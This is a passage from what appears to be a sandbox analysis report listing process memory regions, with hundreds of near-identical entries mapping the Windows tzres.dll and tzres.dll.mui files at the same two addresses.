end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3559
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3560
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3561
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3562
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3563
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3564
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3565
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3566
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3567
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3568
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3569
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3570
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3571
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3572
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3573
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3574
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3575
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3576
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3577
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3578
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3579
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3580
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3581
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3582
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3583
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3584
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3585
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3586
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3587
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3588
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3589
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3590
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3591
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3592
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3593
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3594
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3595
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3596
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3597
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3598
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3599
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3600
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3601
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3602
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3603
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3604
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3605
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3606
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3607
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3608
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3609
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3610
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3611
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3612
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3613
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3614
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3615
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3616
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3617
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3618
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3619
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3620
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3621
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3622
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3623
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3624
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3625
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3626
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3627
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3628
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3629
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3630
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3631
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3632
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3633
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3634
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3635
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3636
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3637
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3638
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3639
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3640
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3641
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3642
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3643
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3644
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3645
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3646
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3647
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3648
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3649
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3650
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3651
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3652
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3653
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3654
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3655
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3656
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3657
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3658
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3659
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3660
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3661
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3662
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3663
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3664
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3665
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3666
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3667
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3668
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3669
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3670
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3671
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3672
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3673
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
